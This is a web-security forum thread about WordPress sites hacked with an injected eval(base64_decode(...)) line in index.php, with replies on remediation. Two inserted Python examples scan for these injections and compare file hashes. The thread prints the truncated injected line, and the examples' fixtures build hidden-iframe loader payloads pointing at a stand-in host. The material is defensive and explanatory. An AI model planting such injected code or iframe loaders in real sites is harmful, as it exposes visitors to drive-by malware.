  1. #1
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Uh oh..host hacked?

    So guys I host about 10 websites on my hosting account. I haven't touched ANY of these websites in at least 2 months max and I went to visit one today in Chrome and get this message:

    "Warning: Something's Not Right Here!
    s*****.com contains content from asugzhivbf.co.tv, a site known to distribute malware. Your computer might catch a virus if you visit this site."

    I was confused...this is my website. So I quickly did what anyone would do, and tried visiting another one of my websites, which also gave me the same warning. AND another. I checked 4 out of the 10 and all gave the same warning.

    So I'm wondering WHAT could have happened and what I should do from this point.

    None of my websites had illegal content, or stolen content. All unique, paid-for scripts, templates, etc.

    Currently running a virus scan on my computer.

  2. #2
    SitePoint Wizard bronze trophy Immerse's Avatar
    Join Date
    Mar 2006
    Location
    Netherlands
    Posts
    1,661
    Mentioned
    7 Post(s)
    Tagged
    1 Thread(s)
    Use FTP to download the index page of one of those sites from your server, and then open it in your HTML editor to view the content (be very careful it doesn't get opened in your browser!).

    Perhaps some code has been added to the page? Or some evil hacker/script kiddie has altered the code in it?

  3. #3
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Immerse,

    Thanks for the response!

    All my sites use Wordpress! So I downloaded via FTP the index.php for one website and opened it in notepad++ (sandboxed)

    On the FTP side none of the files have upload dates since a couple months ago when I last touched it.

    But in the index.php this was all that was in it. I'm not sure if this is normal for a wordpress index.php:

    Code:
    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFI.........FtZT48L2Rpdj4nOw0KfQ=='));
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    Again I'm getting these errors on many of my websites that I own, so whatever it is (or whoever) must know each website I own. Which would lead me to think they know my Host account login. But again, on the FTP side the last activity for anything was the last time I touched it months ago.

    Edit: I have the original Wordpress theme I bought for the website I downloaded the index.php from above. This theme I bought from Themeforest. Since I have the theme saved to my documents, I checked its index.php. The original index.php goes like this:

    Code:
    <?php get_header(); ?>
    
    	
    <div id="slider-wrapper">
    	<div id="slider-inner" class="container_24">
    		
    		<ul id="slider" class="grid_24 omega alpha">
    		
    		<?php
    		$projects = kiss_projects(); // Default limit is 5
    		$image_w = get_option(KISS.'_project_slthumb_w');
            $image_h = get_option(KISS.'_project_slthumb_h');
    		$i=1;
    		foreach( $projects as $project ) {
    			
    			$prodesc = get_post_meta($project["ID"], "_project_desc", true);
    			$prodesc_type = get_post_meta($project["ID"], "_project_type", true);
    			
    			switch ($prodesc_type) {
    			
    				case "Default" : 
    		
    		?>
    		
    		  <li class="panel<?php echo $i ?>">
    		   <div class="textSlide slideContent">
    		    <a href="<?php echo get_permalink($project["ID"]) ?>"><?php get_image("post_ID=".$project["ID"]."&width=".$image_w."&height=".$image_h."&class=featureImage"); ?></a>
    		    <div class="leftFeature grid_11">
    			    <h2><a href="<?php echo get_permalink($project["ID"]) ?>"><?php echo $project["post_title"] ?></a></h2>
    			    <p><?php echo $prodesc ?></p>
    			    <div class="btn orange"><a href="<?php echo get_permalink($project["ID"]) ?>" title="View more"><span>View more</span></a></div>
    		   </div>
    		   </div>
    		  </li>
    		  
    		<?php 
    				break;
    				case "Image" :
    			
    		?>
    		
    		  <li class="panel<?php echo $i ?>">
    			<div class="imageSlide slideContent">
    		 		<?php get_image("post_ID=".$project["ID"]."&width=948&height=247&class=featureImage"); ?>
    		 		<a class="featureObg" href="<?php echo get_permalink($project["ID"]) ?>" title="<?php echo $project["post_title"] ?>"></a>
    		 	</div>
    		  </li>
    		
    		<?php			
    				break;
    			}
    			
    			$i++;
    		
    		} ?>
    		  
    		 </ul>
    		
    	</div>
    </div>
    
    
    <!-- BEGIN main_container_wrapper -->
    <div id="main_container_wrapper"> 
      
      <!-- BEGIN main_container -->
      <div id="main_container" class="container_24"> 
      
      	<?php 
      	
      	if(get_option(KISS."_opt_homepage_style")=="bustyle") {
      		
      		include(TEMPLATEPATH . '/template-home-2.php');
      		
      	} else {
      	
      		include(TEMPLATEPATH . '/template-home-1.php');
      		
      	}
      	?>
        
        
      </div>
      <!-- BEGIN main_container -->
      <div class="clear"></div>
    </div>
    <!-- END main_container_wrapper -->
    
    <?php get_footer(); ?>
    Last edited by Mittineague; Feb 1, 2014 at 14:41.
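Added example (not code from the thread or from WordPress): the injected line in post #3 is `eval(base64_decode('...'))` prepended to the `<?php` line of index.php, and the safe way to learn what it does is to decode the base64 as data, never to run it. This scanner walks a site tree, flags eval-of-decoder patterns in PHP files and hidden iframes in PHP/JS/HTML, and returns the decoded payload as text for a human to read. The sample tree it builds (directory names, the theme name `mytheme`, the payload, and the reserved domain `example.invalid`) is constructed for the example; the real payload in the thread is elided on the page and is not reproduced here.

```python
import base64
import binascii
import os
import re
import tempfile
from pathlib import Path

# File types worth scanning on a WordPress install.
SCAN_EXT = {".php", ".js", ".html", ".htm"}

# eval(<optional decoder>(base64_decode('<base64>'))): the shape of the
# injected line in post #3 plus the common gzinflate/str_rot13 wrappers.
EVAL_B64_RE = re.compile(
    r"""\b(?:eval|assert)\s*\(\s*
        (?:(?:gzinflate|gzuncompress|str_rot13)\s*\(\s*)?
        base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]""",
    re.VERBOSE | re.IGNORECASE,
)

# An iframe sized to 0/1 pixels or styled invisible is the classic
# drive-by download loader that Chrome's warning refers to.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none"
    r"|width\s*=\s*[\"']?[01]\b|height\s*=\s*[\"']?[01]\b)[^>]*>",
    re.IGNORECASE,
)


def decode_payload(b64: str) -> str:
    """Decode base64 as data only; never hand the result to PHP or eval.
    Tolerates embedded whitespace and missing '=' padding."""
    compact = re.sub(r"\s+", "", b64)
    compact += "=" * (-len(compact) % 4)
    try:
        raw = base64.b64decode(compact, validate=True)
    except binascii.Error:
        return "<undecodable base64>"
    return raw.decode("utf-8", errors="replace")


def scan_file(path: Path) -> list:
    """Findings for one file as (kind, line_no, detail) tuples. For an eval
    finding, detail is the decoded payload; for an iframe, the tag itself."""
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for m in EVAL_B64_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        decoded = decode_payload(m.group(1))
        findings.append(("eval_base64", line_no, decoded))
        # The decoded text is usually where the iframe actually lives.
        for im in HIDDEN_IFRAME_RE.finditer(decoded):
            findings.append(("hidden_iframe_in_payload", line_no, im.group(0)))
    for m in HIDDEN_IFRAME_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append(("hidden_iframe", line_no, m.group(0)))
    return findings


def scan_tree(root) -> dict:
    """Map relative path -> findings for every scanned file that has any."""
    root = Path(root)
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in SCAN_EXT:
                continue
            found = scan_file(p)
            if found:
                results[p.relative_to(root).as_posix()] = found
    return results


# Constructed payload of the kind the live index.php carried: silence PHP
# errors, then print a hidden iframe. example.invalid is a reserved name.
SAMPLE_PAYLOAD = (
    "error_reporting(0);\n"
    "echo '<iframe src=\"http://example.invalid/in.php\" width=\"1\" "
    "height=\"1\" style=\"visibility:hidden\"></iframe>';\n"
)
CLEAN_INDEX = (
    "<?php\n"
    "define('WP_USE_THEMES', true);\n"
    "require('./wp-blog-header.php');\n"
)


def build_sample_site(root) -> Path:
    """Constructed tree: a clean index.php, an index.php with the eval line
    prepended on the <?php line as in post #3, a theme JS file that writes a
    0x0 iframe, and a .txt file that must be skipped."""
    root = Path(root)
    b64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    theme = root / "infected" / "wp-content" / "themes" / "mytheme"
    (root / "clean").mkdir(parents=True)
    theme.mkdir(parents=True)
    (root / "clean" / "index.php").write_text(CLEAN_INDEX)
    (root / "infected" / "index.php").write_text(
        "<?php eval(base64_decode('" + b64 + "'));\n" + CLEAN_INDEX[len("<?php\n"):]
    )
    (theme / "script.js").write_text(
        "document.write('<iframe src=\"http://example.invalid/\" "
        "width=\"0\" height=\"0\"></iframe>');\n"
    )
    (root / "infected" / "readme.txt").write_text("eval(base64_decode('QUJD'))\n")
    return root


def demo() -> dict:
    """Build the constructed tree in a temp dir and scan it."""
    return scan_tree(build_sample_site(Path(tempfile.mkdtemp()) / "site"))


if __name__ == "__main__":
    for rel, found in demo().items():
        for kind, line_no, detail in found:
            print(f"{rel}:{line_no} {kind}\n    {detail.strip()}")
```

Run it against a copy of the site downloaded over FTP, never against the live document root from a browser. The visible start of the thread's own string, `ZXJyb3JfcmVwb3J0aW5nKDApOw0K`, decodes with `decode_payload` to `error_reporting(0);` followed by a CRLF, which is the usual opener for this family: suppress errors, then emit the loader.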

  4. #4
    From space with love silver trophy
    SpacePhoenix's Avatar
    Join Date
    May 2007
    Location
    Poole, UK
    Posts
    5,072
    Mentioned
    103 Post(s)
    Tagged
    0 Thread(s)
    Are all of the sites hosted on the same server or are the ones that have been hacked on a separate server?

    Are they on a dedicated server or shared hosting?

  5. #5
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    SpacePhoenix,

    They are all on the same host, plan with unlimited domains allowed. Got about 10 domains on this one host. So I'm pretty sure it's all on the same server.

    I'm not too sure what I'm looking for but I was browsing some logs and what not on the Hostgator CP and saw a few "fishy" looking things.

    In the "error logs" section it listed these errors (some things *** out by me)

    Code:
    [Sun Aug 14 16:45:57 2011] [error] [client 67.195.110.173] (13)Permission denied: file permissions deny server access: /home/******/public_html/****.COM/.ftpquota
    [Sun Aug 14 15:58:19 2011] [error] [client 124.115.1.66] File does not exist: /home/***********/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
    [Sun Aug 14 15:58:18 2011] [error] [client 124.115.1.66] File does not exist: /home/************/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
    [Sun Aug 14 15:50:53 2011] [error] [client 89.123.45.34] File does not exist: /home/*********/public_html/game***/forums/60;URL=online.php
    [Sun Aug 14 15:50:09 2011] [error] [client 89.123.45.34] attempt to invoke directory as script: /home/*****/public_html/game***/cgi-bin/
    [Sun Aug 14 15:50:08 2011] [error] [client 89.123.45.34] (13)Permission denied: file permissions deny server access: /home/******/public_html/game***/.ftpquota
    Also under visitors for one of the websites I saw in the last 300, a bunch of visits to certain folders and directories of my theme by a user agent called "Java/1.6.0_04" all from an IP in romania.

    Not sure if any of this ^^ could mean something or it's nothing.

  6. #6
    SitePoint Wizard bronze trophy Immerse's Avatar
    Join Date
    Mar 2006
    Location
    Netherlands
    Posts
    1,661
    Mentioned
    7 Post(s)
    Tagged
    1 Thread(s)
    Yeah, it's that first line. It writes an iframe which loads a page from some weird URL which wants to download some evil stuff onto your PC.

    What to do now?

    1) change all your passwords related to your hosting (FTP, cPanel, MySQL etc).
    2) upload a fresh copy of index.php to each site or, even better, fresh WordPress installs (although that might take some work to get your sites working again with all plugins etc.). You can probably leave the databases in place, they generally don't tend to get updated with this kind of attack.

  7. #7
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Immerse View Post
    Yeah, it's that first line. It writes an iframe which loads a page from some weird URL which wants to download some evil stuff onto your PC.

    What to do now?

    1) change all your passwords related to your hosting (FTP, cPanel, MySQL etc).
    2) upload a fresh copy of index.php to each site or, even better, fresh WordPress installs (although that might take some work to get your sites working again with all plugins etc.). You can probably leave the databases in place, they generally don't tend to get updated with this kind of attack.
    Immerse,

    Thanks I will go through and do that now with all the websites.

    And out of curiosity, how does the "hacker" do something like this? Not looking for a play by play, but do they log into my FTP and download or inject it?

  8. #8
    SitePoint Wizard bronze trophy Immerse's Avatar
    Join Date
    Mar 2006
    Location
    Netherlands
    Posts
    1,661
    Mentioned
    7 Post(s)
    Tagged
    1 Thread(s)
    To be honest, I have no idea at all. Perhaps a vulnerability in WordPress? Perhaps they hacked a different account on the server? Maybe they brute-forced their way into your FTP account?

    Maybe someone else has more knowledge about how this is done...

  9. #9
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I just went ahead and wiped EVERYTHING. All sub directories on the server, removed all mySQL databases, etc.

    I haven't touched any of those websites in months. There are new versions of WP out too, which I noticed, so that might have been a big issue. A blank slate is better; at least I can re-do everything with more security in mind.

    Thanks for the help guys!

  10. #10
    It's all Geek to me silver trophybronze trophy
    ralph.m's Avatar
    Join Date
    Mar 2009
    Location
    Melbourne, AU
    Posts
    24,319
    Mentioned
    462 Post(s)
    Tagged
    8 Thread(s)
    Off Topic:

    This is not an accessibility / usability issue, so moved to the web security forum.

  11. #11
    SitePoint Enthusiast
    Join Date
    May 2011
    Posts
    35
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by cluongo View Post
    And out of curiosity, how does the "hacker" do something like this? Not looking for a play by play, but do they log into my FTP and download or inject it?
    It is usually one of two:
    1) Stealing your FTP credentials (usually using a Trojan on your PC) and then uploading a new index.php
    2) Stealing/guessing your WP admin password and editing index.php

    So two more suggestions:
    1) Scan your PC for viruses
    2) Change your WP admin password

    Sometimes it might be one of your WP plugins that is vulnerable to injection attacks that allow modifying files. So make sure your WP and plugins are up to date with the most recent version.

  12. #12
    SitePoint Author silver trophybronze trophy
    wwb_99's Avatar
    Join Date
    May 2003
    Location
    Washington, DC
    Posts
    10,653
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    Lots of other vectors:

    3) Used an insecurely configured plugin or old version of wordpress to overwrite index.php
    4) Used a vulnerability in someone else's site on the same server to overwrite your index.php

    Once they've got one file in there, they are golden -- they should be able to overwrite and update anything they want.

  13. #13
    SitePoint Addict
    Join Date
    Apr 2009
    Posts
    358
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    I had a similar attack on a shared hosting account, one that I'd done nothing with for a year or two. You should check index.php in subdirectories, also check any .js files. In my case numerous files got the hack line added, not just the site index file. Using FTP I spotted the other files by looking at the file modification date.
    Doug G
    =====
    "If you ain't the lead dog, the view is always the same - Anon
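Added example (not code from the thread or from WordPress), serving both post #6's advice to upload fresh copies and post #13's advice to hunt for other edited files by modification date. Post #3 noted that the FTP listing showed nothing newer than the owner's last upload; that is the weakness of the date check, because whoever can write a file can also reset its timestamp. Comparing the live tree against a known-good copy by content hash (the WordPress release archive, the theme zip the owner still has) finds edited files regardless of their dates and also lists files the attacker added. Everything below (paths, the `mytheme` name, file contents, the old timestamp) is constructed for the example.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root) -> dict:
    """relative posix path -> sha256 for every regular file under root."""
    root = Path(root)
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            out[p.relative_to(root).as_posix()] = sha256_file(p)
    return out


def diff_trees(pristine_root, live_root, ignore=("wp-config.php",)) -> dict:
    """Compare a live site against a known-good copy by content.
    'added' is every live file absent from the pristine tree; on a real site
    that includes uploads and plugins, so it is a review list, not a delete
    list. Per-site files such as wp-config.php are skipped by default."""
    pristine = hash_tree(pristine_root)
    live = hash_tree(live_root)
    modified = sorted(
        p for p in pristine
        if p in live and live[p] != pristine[p] and p not in ignore
    )
    added = sorted(p for p in live if p not in pristine and p not in ignore)
    missing = sorted(p for p in pristine if p not in live and p not in ignore)
    return {"modified": modified, "added": added, "missing": missing}


def newer_than(root, baseline_epoch: float) -> list:
    """The check the thread relied on: files whose mtime is after baseline."""
    root = Path(root)
    return sorted(
        (Path(d) / n).relative_to(root).as_posix()
        for d, _dirs, files in os.walk(root)
        for n in files
        if (Path(d) / n).stat().st_mtime > baseline_epoch
    )


CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
CLEAN_JS = "jQuery(function () { /* theme slider */ });\n"
INJECTED_LINE = "<?php eval(base64_decode('QUJD')); /* constructed placeholder */\n"
ADDED_FILE = "<?php /* constructed: a file the pristine tree never had */\n"


def build_sample(root) -> tuple:
    """Constructed scenario. Both trees start identical with old timestamps.
    In the live tree index.php is edited and its mtime reset to the old value
    (what anyone with write access can do with touch), a theme JS file is
    edited and keeps its fresh mtime, and one new file appears."""
    root = Path(root)
    old = 1_300_000_000  # epoch seconds, months before the incident
    for name in ("pristine", "live"):
        theme = root / name / "wp-content" / "themes" / "mytheme"
        theme.mkdir(parents=True)
        (root / name / "index.php").write_text(CLEAN_INDEX)
        (theme / "slider.js").write_text(CLEAN_JS)
        for p in (root / name).rglob("*"):
            if p.is_file():
                os.utime(p, (old, old))
    live = root / "live"
    (live / "index.php").write_text(INJECTED_LINE + CLEAN_INDEX[len("<?php\n"):])
    os.utime(live / "index.php", (old, old))  # timestamp forged back
    (live / "wp-content" / "themes" / "mytheme" / "slider.js").write_text(
        CLEAN_JS
        + "document.write('<iframe src=\"http://example.invalid/\" width=0 height=0></iframe>');\n"
    )
    (live / "wp-content" / "uploads").mkdir()
    (live / "wp-content" / "uploads" / "cache.php").write_text(ADDED_FILE)
    return root / "pristine", live, old


def demo() -> dict:
    """Run both checks on the constructed scenario and return the report."""
    pristine, live, baseline = build_sample(Path(tempfile.mkdtemp()) / "site")
    report = diff_trees(pristine, live)
    report["newer_than_baseline"] = newer_than(live, baseline)
    return report


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

In the constructed run the date check misses the forged index.php and only reports slider.js and the new file, while the hash comparison reports all three. Against a real site, unpack the same WordPress version and the same theme version into the pristine tree; anything left in `added` after uploads and known plugins are accounted for deserves a look with the scanner.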

  14. #14
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks for the replies guys. Sucks when it happens but it's a good lesson. I'll definitely have a bigger emphasis on security in future websites and on my regular PC desktop.

